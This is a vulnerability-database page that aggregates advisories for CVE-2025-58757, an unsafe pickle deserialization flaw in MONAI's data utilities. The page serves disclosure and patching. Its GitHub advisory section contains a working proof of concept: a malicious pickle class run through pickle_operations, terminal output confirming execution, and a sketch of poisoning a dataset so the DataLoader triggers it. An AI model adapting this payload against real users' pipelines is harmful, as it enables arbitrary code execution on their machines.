Vulnerability-Lookup

PYSEC-2025-142

Vulnerability from pysec - Published: 2025-09-09 00:15 - Updated: 2026-05-20 09:19

Details

MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, the pickle_operations function in monai/data/utils.py automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures. The deserialization may lead to code execution. As of time of publication, no known fixed versions are available.

Severity

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Impacted products

Name	purl
monai	pkg:pypi/monai

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "monai",
        "purl": "pkg:pypi/monai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.1rc1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.0.1",
        "0.1.0",
        "0.2.0",
        "0.3.0",
        "0.4.0",
        "0.5.0",
        "0.5.1",
        "0.5.2",
        "0.5.3",
        "0.6.0",
        "0.7.0",
        "0.8.0",
        "0.8.1",
        "0.9.0",
        "0.9.1",
        "1.0.0",
        "1.0.1",
        "1.1.0",
        "1.2.0",
        "1.3.0",
        "1.3.1",
        "1.3.2",
        "1.3.2rc1",
        "1.3.3rc1",
        "1.4.0",
        "1.4.0rc1",
        "1.4.0rc10",
        "1.4.0rc11",
        "1.4.0rc12",
        "1.4.0rc2",
        "1.4.0rc3",
        "1.4.0rc4",
        "1.4.0rc5",
        "1.4.0rc6",
        "1.4.0rc7",
        "1.4.0rc8",
        "1.4.0rc9",
        "1.4.1rc1",
        "1.5.0",
        "1.5.0rc1"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58757",
    "GHSA-p8cm-mm2v-gwjm"
  ],
  "details": "MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, the `pickle_operations` function in `monai/data/utils.py` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using `pickle.loads()` . This function also lacks any security measures. The deserialization may lead to code execution. As of time of publication, no known fixed versions are available.",
  "id": "PYSEC-2025-142",
  "modified": "2026-05-20T09:19:08.755386Z",
  "published": "2025-09-09T00:15:32.650Z",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2025-58757 (GCVE-0-2025-58757)

Vulnerability from cvelistv5 – Published: 2025-09-08 23:42 – Updated: 2025-09-09 13:28

Title

MONAI's unsafe use of Pickle deserialization may lead to RCE

Summary

MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, the `pickle_operations` function in `monai/data/utils.py` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using `pickle.loads()` . This function also lacks any security measures. The deserialization may lead to code execution. As of time of publication, no known fixed versions are available.

Severity

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/Project-MONAI/MONAI/security/a…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
Project-MONAI	MONAI	Affected: <= 1.5.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-58757",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-09T13:12:53.146047Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-09T13:28:51.574Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "MONAI",
          "vendor": "Project-MONAI",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 1.5.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, the `pickle_operations` function in `monai/data/utils.py` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using `pickle.loads()` . This function also lacks any security measures. The deserialization may lead to code execution. As of time of publication, no known fixed versions are available."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-08T23:42:33.016Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm"
        }
      ],
      "source": {
        "advisory": "GHSA-p8cm-mm2v-gwjm",
        "discovery": "UNKNOWN"
      },
      "title": "MONAI\u0027s unsafe use of Pickle deserialization may lead to RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-58757",
    "datePublished": "2025-09-08T23:42:11.009Z",
    "dateReserved": "2025-09-04T19:18:09.500Z",
    "dateUpdated": "2025-09-09T13:28:51.574Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-P8CM-MM2V-GWJM

Vulnerability from github – Published: 2025-09-09 21:21 – Updated: 2025-09-26 16:40

Summary

Monai: Unsafe use of Pickle deserialization may lead to RCE

Details

To prevent this report from being deemed inapplicable or out of scope, due to the project's unique nature (for medical applications) and widespread popularity (6k+ stars), it's important to pay attention to some of the project's inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.)

Summary

The pickle_operations function in monai/data/utils.py automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures.

When verified using the following proof-of-concept, arbitrary code execution can occur.

#Poc
from monai.data.utils import pickle_operations  

import pickle  
import subprocess  

class MaliciousPayload:  
    def __reduce__(self):    
        return (subprocess.call, (['touch', '/tmp/hacker1.txt'],))  

malicious_data = pickle.dumps(MaliciousPayload())

attack_data = {  
    'image': 'normal_image_data',  
    'label_transforms': malicious_data,  
    'metadata_transforms': malicious_data  
}

result = pickle_operations(attack_data, is_encode=False)

#My /tmp directory contents before running the POC
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid

Before running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful.

#Running Poc
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid

The above proof-of-concept is merely a validation of the vulnerability. The attacker creates malicious dataset content.

malicious_data = {
  'image': normal_image_tensor,
  'label': normal_label_tensor,
  'preprocessing_transforms': pickle.dumps(MaliciousPayload()), # Malicious payload
  'augmentation_transforms': pickle.dumps(MaliciousPayload()) # Multiple attack points
}

dataset = [malicious_data, ...]

When a user batch-processes data using MONAI's list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations.

from monai.data import list_data_collate

dataloader = DataLoader(
dataset,
batch_size=4,
collate_fn=list_data_collate # Trigger the vulnerability
)

# Automatically execute malicious code while traversing the data

for batch in dataloader:

# Malicious code is executed in pickle_operations

pass

When a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered.

Impact

Arbitrary code execution

Repair suggestions

Verify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface's transformer library.

Severity

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "monai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58757"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T21:21:23Z",
    "nvd_published_at": "2025-09-09T00:15:32Z",
    "severity": "HIGH"
  },
  "details": "\u003eTo prevent this report from being deemed inapplicable or out of scope, due to the project\u0027s unique nature (for medical applications) and widespread popularity (6k+ stars), it\u0027s important to pay attention to some of the project\u0027s inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.)\n\n### Summary\nThe ```pickle_operations``` function in ```monai/data/utils.py``` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures.\n\nWhen verified using the following proof-of-concept, arbitrary code execution can occur.\n```\n#Poc\nfrom monai.data.utils import pickle_operations  \n\nimport pickle  \nimport subprocess  \n  \nclass MaliciousPayload:  \n    def __reduce__(self):    \n        return (subprocess.call, ([\u0027touch\u0027, \u0027/tmp/hacker1.txt\u0027],))  \n  \nmalicious_data = pickle.dumps(MaliciousPayload())\n\nattack_data = {  \n    \u0027image\u0027: \u0027normal_image_data\u0027,  \n    \u0027label_transforms\u0027: malicious_data,  \n    \u0027metadata_transforms\u0027: malicious_data  \n}\n\nresult = pickle_operations(attack_data, is_encode=False)  \n```\n\n```\n#My /tmp directory contents before running the POC\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid\n```\nBefore running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful.\n```\n#Running Poc\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py \nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid\n```\nThe above proof-of-concept is merely a validation of the vulnerability.\nThe attacker creates malicious dataset content.\n```\nmalicious_data = {\n  \u0027image\u0027: normal_image_tensor,\n  \u0027label\u0027: normal_label_tensor,\n  \u0027preprocessing_transforms\u0027: pickle.dumps(MaliciousPayload()), # Malicious payload\n  \u0027augmentation_transforms\u0027: pickle.dumps(MaliciousPayload()) # Multiple attack points\n}\n\ndataset = [malicious_data, ...]\n```\nWhen a user batch-processes data using MONAI\u0027s list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations.\n```\nfrom monai.data import list_data_collate\n\ndataloader = DataLoader(\ndataset,\nbatch_size=4,\ncollate_fn=list_data_collate # Trigger the vulnerability\n)\n\n# Automatically execute malicious code while traversing the data\n\nfor batch in dataloader:\n\n# Malicious code is executed in pickle_operations\n\npass\n```\nWhen a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered.\n\n### Impact\nArbitrary code execution\n\n### Repair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface\u0027s transformer library.",
  "id": "GHSA-p8cm-mm2v-gwjm",
  "modified": "2025-09-26T16:40:06Z",
  "published": "2025-09-09T21:21:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58757"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/pull/8566"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/commit/948fbb703adcb87cd04ebd83d20dcd8d73bf6259"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Project-MONAI/MONAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Monai: Unsafe use of Pickle deserialization may lead to RCE"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2025-142

CVE-2025-58757 (GCVE-0-2025-58757)

GHSA-P8CM-MM2V-GWJM

Summary

Impact

Repair suggestions

Tags

Sightings

Nomenclature